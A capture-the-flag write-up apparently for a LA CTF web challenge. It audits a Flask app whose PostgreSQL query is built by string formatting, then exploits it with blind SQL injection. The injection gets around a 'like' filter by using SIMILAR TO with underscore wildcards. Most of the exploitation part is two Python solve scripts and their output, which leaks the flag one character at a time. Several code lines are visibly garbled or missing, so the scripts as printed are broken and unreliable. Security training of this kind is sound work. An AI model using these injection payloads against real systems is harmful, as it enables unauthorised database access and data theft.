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Table of Contents

  1. Overview
  2. Background
  3. Enumeration
  4. Exploitation
  5. Conclusion



I got tired of people leaking my password from the db so I moved it out of the db.


Index page:

In here, it has an input box.

Let’s enter some dummy text into it:

Burp Suite HTTP history:

When we submit the form, it’ll send a POST request to /submit with parameter name username.

Not much we can do in here, let’s read through this web application’s source code!

In this challenge, we can download a file:

└> file Zip archive data, at least v2.0 to extract, compression method=deflate
└> unzip 
  inflating: docker-compose.yaml     
  inflating: Dockerfile              
 extracting: requirements.txt        

After reading the source code, we have the following findings:

The DBMS (Database Management System) is PostgreSQL:

import os
from functools import cache
import psycopg2
def get_database_connection():
    # Get database credentials from environment variables
    db_user = os.environ.get("POSTGRES_USER")
    db_password = os.environ.get("POSTGRES_PASSWORD")
    db_host = "db"

    # Establish a connection to the PostgreSQL database
    connection = psycopg2.connect(user=db_user, password=db_password, host=db_host)

    return connection

The database is initialized when the Flask app is running:

from flask import Flask, request

app = Flask(__name__)
flag = Path("/app/flag.txt").read_text().strip()
with app.app_context():
    conn = get_database_connection()
    create_sql = """
        DROP TABLE IF EXISTS penguins;
        CREATE TABLE IF NOT EXISTS penguins (
            name TEXT
    with conn.cursor() as curr:
        curr.execute("SELECT COUNT(*) FROM penguins")
        if curr.fetchall()[0][0] == 0:
            curr.execute("INSERT INTO penguins (name) VALUES ('peng')")
            curr.execute("INSERT INTO penguins (name) VALUES ('emperor')")
            curr.execute("INSERT INTO penguins (name) VALUES ('%s')" % (flag))

In here, we can see that a table named penguins is created, and it has column name. In those 3 INSERT SQL query, the flag was inserted into table penguins.

The most interesting is the POST method route /submit:

allowed_chars = set(string.ascii_letters + string.digits + " 'flag{a_word}'")
forbidden_strs = ["like"]
def submit_form():
    conn = None
        username = request.form["username"]
        conn = get_database_connection()

        assert all(c in allowed_chars for c in username), "no character for u uwu"
        assert all(
            forbidden not in username.lower() for forbidden in forbidden_strs
        ), "no word for u uwu"

        with conn.cursor() as curr:
            curr.execute("SELECT * FROM penguins WHERE name = '%s'" % username)
            result = curr.fetchall()

        if len(result):
            return "We found a penguin!!!!!", 200
        return "No penguins sadg", 201

    except Exception as e:
        return f"Error: {str(e)}", 400

    # need to commit to avoid connection going bad in case of error
        if conn is not None:

In here, we can see that the executing SQL query is vulnerable to SQL injection, as it doesn’t use prepared statement:

with conn.cursor() as curr:
    curr.execute("SELECT * FROM penguins WHERE name = '%s'" % username)
    result = curr.fetchall()

Also, the result doesn’t get reflected. When result is returned, it just response back We found a penguin!!!!!:

if len(result):
    return "We found a penguin!!!!!", 200
return "No penguins sadg", 201

So, this route is vulnerable to Blind-based SQL injection!

However, it does some filtering:

allowed_chars = set(string.ascii_letters + string.digits + " 'flag{a_word}'")
forbidden_strs = ["like"]
assert all(c in allowed_chars for c in username), "no character for u uwu"
assert all(
    forbidden not in username.lower() for forbidden in forbidden_strs
), "no word for u uwu"

As you can see, the following characters and string are not allowed:

Allowed characters:
Allowed string:

Hmm… How can we leak the flag without using LIKE clause

After Googling “postgresql like alternative”, I found this StackOverflow post:


According to pattern matching operators in PostgreSQL, we can use SIMILAR TO operator to replace LIKE clause, which allows us to use regular expression pattern to find the matches string:

Also, according to w3resource about SIMILAR TO operator, the example is like this:

SELECT <column_name> FROM <table_name> WHERE <column_name> SIMILAR TO '<regular_expression_pattern>';


Based on the above findings, we can exfiltrate the flag via exploiting Blind-based SQL injection with SIMILAR TO operator!

Now, our payload can be:

' OR name SIMILAR TO '<regular_expression_pattern>'

But wait, this will cause syntax error because the single quote didn’t get closed. We also can’t use comment because those characters aren’t in the allowed_chars:

To bypass that, we can just leave the single quote open, like this:

' OR name SIMILAR TO '<regular_expression_pattern>

Uhh… Then? How can we use regular expression pattern to leak the flag?

According to W3Schools, PostgreSQL has some wildcard characters:

Since % is not in the allowed_chars, we’ll have to use _ wildcard character.

Now, with the knowledge of wildcard characters, we can try to leak the flag.

To find out the flag’s string length, we can use _ multiple wildcard characters. If the string length doesn’t match with our wildcard characters length, it’ll return False, otherwise returns True.

To do so, we can write a Python script to automate that:

#!/usr/bin/env python3
import requests

class Exploit:
    def __init__(self, baseUrl):
        self.baseUrl = baseUrl
        self.SUBMIT_ROUTE = '/submit'
        self.WILDCARD_CHARACTER = '_'
        self.EXCLUDED_NAMES = ('peng', 'emperor')
        self.EXCLUDED_NAMES_LENGTH = (len(self.EXCLUDED_NAMES[0]), len(self.EXCLUDED_NAMES[1]))

    def leakFlagStringLength(self):
        for length in range(1, 100):
            print(f'[*] Finding flag string length. Current length: {length}', end='\r')

            payload = f"' OR name SIMILAR TO '{self.WILDCARD_CHARACTER * length}"
            data = {
                'username': payload
            response ='{self.baseUrl}{self.SUBMIT_ROUTE}', data=data)
            isFailed = True if response.status_code == 201 else False
            if isFailed:
            if length == self.EXCLUDED_NAMES_LENGTH[0] or length == self.EXCLUDED_NAMES_LENGTH[1]:
                print(f'[*] Length {length} returned boolean value True, but the length is same as the database\'s penguin name')

            return length

if __name__ == '__main__':
    baseUrl = ''
    exploit = Exploit(baseUrl)

    flagStringLength = exploit.leakFlagStringLength()
    print(f'[+] We found the correct flag string length: {flagStringLength}')
└> python3
[*] Length 4 returned boolean value True, but the length is same as the database's penguin name
[*] Length 7 returned boolean value True, but the length is same as the database's penguin name
[+] We found the correct flag string length: 45

Now we know that the flag string length is 45!

In this step, we can simply brute force the flag’s character with the allowed_chars!

However, it’s worth noting that an error will occurred with the following SQL query:

' OR name SIMILAR TO 'lactf{1______________________________________

This is because, in regular expression, {x} is to match previous token (Character) exactly x times.

Since we know the flag format is lactf{.*}, we can just not to prepend and append the lactf{ and } to the regular expression pattern.

So, our payload will be something like this:

' OR name SIMILAR TO '______1______________________________________
' OR name SIMILAR TO '______12_____________________________________
' OR name SIMILAR TO '______123____________________________________

Armed with above information, we can finish our Python solve script:

#!/usr/bin/env python3
import requests
from string import ascii_letters, digits

class Exploit:
    def __init__(self, baseUrl):
        self.baseUrl = baseUrl
        self.SUBMIT_ROUTE = '/submit'
        self.WILDCARD_CHARACTER = '_'
        self.EXCLUDED_NAMES = ('peng', 'emperor')
        self.EXCLUDED_NAMES_LENGTH = tuple(len(name) for name in self.EXCLUDED_NAMES)

        # underscore (_) and single quote (') character is excluded, 
        # because it's the wildcard character and will cause syntax error
        # space ( ) character is also excluded, because the flag format shouldn't have that character?
        self.ALLOWED_CHARS = sorted(set(ascii_letters + digits + "flag{aword}"))
        self.PREPENDED_FLAG = 'lactf{'
        self.APPENDED_FLAG = '}'

    def leakFlagStringLength(self):
        for length in range(1, 100):
            print(f'[*] Finding flag string length | Current length: {length}', end='\r')

            payload = f"' OR name SIMILAR TO '{self.WILDCARD_CHARACTER * length}"
            data = {
                'username': payload
            response ='{self.baseUrl}{self.SUBMIT_ROUTE}', data=data)
            isFailed = True if response.status_code == 201 else False
            if isFailed:
            if length == self.EXCLUDED_NAMES_LENGTH[0] or length == self.EXCLUDED_NAMES_LENGTH[1]:
                if length == self.EXCLUDED_NAMES_LENGTH[0]:
                    print(f'[*] Length {length} returned boolean value True, but the length is same as the database\'s penguin name "{self.EXCLUDED_NAMES[0]}"')
                elif length == self.EXCLUDED_NAMES_LENGTH[1]:
                    print(f'[*] Length {length} returned boolean value True, but the length is same as the database\'s penguin name "{self.EXCLUDED_NAMES[1]}"')


            return length

    def leakFlagData(self, flagStringLength):
        leakedFlag, formattedFlag = str(), str()
        while len(formattedFlag) < flagStringLength:
            formattedFlag = self.PREPENDED_FLAG + leakedFlag + self.APPENDED_FLAG
            if len(formattedFlag) == flagStringLength:

            for character in self.ALLOWED_CHARS:
                print(f'[*] Brute forcing character "{character}" | Current leaked flag: {formattedFlag}', end='\r')

                regexCharacters = leakedFlag + character
                charactersLeft = flagStringLength - self.PREPENDED_FLAG_LENGTH - self.APPENDED_FLAG_LENGTH - len(regexCharacters)

                regexPattern = self.WILDCARD_CHARACTER * self.PREPENDED_FLAG_LENGTH
                regexPattern += regexCharacters
                regexPattern += self.WILDCARD_CHARACTER * charactersLeft
                regexPattern += self.WILDCARD_CHARACTER * self.APPENDED_FLAG_LENGTH

                payload = f"' OR name SIMILAR TO '{regexPattern}"
                data = {
                    'username': payload
                response ='{self.baseUrl}{self.SUBMIT_ROUTE}', data=data)
                isFailed = True if response.status_code == 201 else False
                isLastCharacter = True if character == self.ALLOWED_CHARS[-1] else False
                isFailedLastCharacter = True if isFailed and isLastCharacter else False

                # if we loop through all possible character and still failed, 
                # we can assume that the correct flag character is the underscore character
                if isFailedLastCharacter:
                    leakedFlag += self.WILDCARD_CHARACTER

                if isFailed:

                leakedFlag += character

        isLeakedSuccessfully = False
        if len(formattedFlag) != flagStringLength:
            return isLeakedSuccessfully, formattedFlag

        isLeakedSuccessfully = True
        return isLeakedSuccessfully, formattedFlag

if __name__ == '__main__':
    baseUrl = ''
    exploit = Exploit(baseUrl)

    print('[*] Leaking the flag string length...')
    flagStringLength = exploit.leakFlagStringLength()
    if not flagStringLength:
        print('\n[-] Unable to find the correct flag string length')

    print(f'\n[+] We found the correct flag string length: {flagStringLength}')

    print('[*] Leaking the flag...')
    isLeakedSuccessfully, formattedFlag = exploit.leakFlagData(flagStringLength)
    if not isLeakedSuccessfully:
        print(f'\n[-] The leaked flag length is not the same as the flag string length ({flagStringLength}). Leaked flag: {formattedFlag}')

    print(f'\n[+] The flag has been fully leaked! Flag: {formattedFlag}')
└> python3
[*] Leaking the flag string length...
[*] Length 4 returned boolean value True, but the length is same as the database's penguin name "peng"
[*] Length 7 returned boolean value True, but the length is same as the database's penguin name "emperor"
[*] Finding flag string length | Current length: 45
[+] We found the correct flag string length: 45
[*] Leaking the flag...
[*] Brute forcing character "0" | Current leaked flag: lactf{90stgr35_3s_n0t_l7k3_th3_0th3r_dbs_0w}
[+] The flag has been fully leaked! Flag: lactf{90stgr35_3s_n0t_l7k3_th3_0th3r_dbs_0w0}


What we’ve learned:

  1. PostgreSQL Blind-based SQL injection with conditional responses and filter bypass